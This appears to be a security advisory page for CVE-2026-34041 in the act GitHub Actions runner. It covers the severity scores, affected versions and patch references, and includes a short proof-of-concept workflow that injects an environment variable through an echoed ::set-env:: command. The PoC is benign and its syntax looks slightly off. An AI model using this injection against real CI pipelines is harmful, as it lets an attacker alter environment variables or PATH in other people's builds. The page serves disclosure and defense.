Security Vulnerability Report
CVE-2026-34041 CVSS 9.8 CRITICAL

Published: 2026-03-31 03:15:58
Last Modified: 2026-04-06 15:34:15

Description

act is a tool for running GitHub Actions workflows locally. Prior to version 0.2.86, act unconditionally processed the deprecated ::set-env:: and ::add-path:: workflow commands, which had been disabled upstream because of environment-injection risks. When a workflow step echoes untrusted data to stdout, an attacker can inject these commands to set arbitrary environment variables or modify PATH for all subsequent steps in the job. This issue has been patched in version 0.2.86.

CVSS Details

CVSS Score (v3.1, CISA-ADP secondary)
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVSS Score (v4.0, GitHub secondary)
7.7
Severity
HIGH
CVSS Vector
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
Weakness
CWE-74 (Improper Neutralization of Special Elements in Output Used by a Downstream Component)

Configurations (Affected Products)

cpe:2.3:a:nektos:act:*:*:*:*:*:*:*:* - VULNERABLE
act < 0.2.86

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
yaml
name: POC for CVE-2026-34041
on: push
jobs:
  vulnerable_job:
    runs-on: ubuntu-latest
    steps:
      - name: Checkout
        uses: actions/checkout@v2
      - name: Exploit Step (Echo malicious command)
        run: |
          # Injecting a malicious environment variable via stdout
          echo "::set-env:: name=MALICIOUS_VAR::pwned"
          echo "PATH has been modified or variable set"
      - name: Verification Step
        run: |
          # This step will see the injected variable
          echo "MALICIOUS_VAR is $MALICIOUS_VAR"
          if [ "$MALICIOUS_VAR" == "pwned" ]; then
            echo "VULNERABILITY CONFIRMED"
          fi

References

https://github.com/nektos/act/commit/0c739c8e39c41aa5a07665f732da9cab6df0097a (Patch)
https://github.com/nektos/act/releases/tag/v0.2.86 (Product)
https://github.com/nektos/act/security/advisories/GHSA-xmgr-9pqc-h5vw (Exploit, Mitigation, Vendor Advisory)
